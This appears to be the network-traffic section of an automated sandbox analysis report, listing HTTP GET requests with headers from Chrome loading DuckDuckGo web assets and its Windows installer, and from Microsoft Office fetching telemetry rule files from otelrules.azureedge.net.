Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/web-protection-ios-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-front-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/download-bg-sm.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700100v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702101v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700951v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700950v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/app-protection-front-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/app-protection-android-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/css/9cf77fa71faeba25.css HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/download-bg-dark-sm.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/download-bg-md-lg.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/download-bg-dark-md-lg.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/67191-8ba2ab1c9d234a2e.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /favicon.ico HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700451v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703551v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703550v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702701v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/grain.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/download-bg-sm.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/download-bg-dark-sm.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/66556-09213e8df9ecec74.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/79567-e254aebee0b28943.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule700450v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701900v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5Blocale%5D/windows-e9460cf0c20fe9ca.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/67191-8ba2ab1c9d234a2e.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701901v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704001v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9If-None-Match: "67049d25-a3f8"
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/download-bg-md-lg.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/grain.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/backgrounds/download-bg-dark-md-lg.jpg HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/windows/install-step-01.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/66556-09213e8df9ecec74.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/79567-e254aebee0b28943.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/%5Blocale%5D/windows-e9460cf0c20fe9ca.js HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702401v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703250v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702700v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703251v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704000v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /windows-desktop-browser/installer/funnel_home___hero/DuckDuckGo.appinstaller HTTP/1.1Host: staticcdn.duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: same-siteSec-Fetch-Mode: navigateSec-Fetch-Dest: iframeReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/windows/install-step-02.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/windows/install-step-03-welcome.png HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /_next/static/chunks/pages/about-62f92f4232f2836a.js HTTP/1.1Host: duckduckgo.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Purpose: prefetchSec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyReferer: https://duckduckgo.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule701551v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700300v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702400v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule700301v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule701550v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/web-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=177813-177813If-Range: "67049d23-2c70e"
Source: global trafficHTTP traffic detected: GET /static-assets/image/pages/home/devices/how-it-works/desktop/search-protection-back-light.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9Range: bytes=177813-177813If-Range: "67049d27-32057"
Source: global trafficHTTP traffic detected: GET /static-assets/image/windows/install-step-01.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/windows/install-step-02.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /static-assets/image/windows/install-step-03-welcome.png HTTP/1.1Host: duckduckgo.comConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule702000v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702001v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702601v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule702600v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703201v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule703200v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
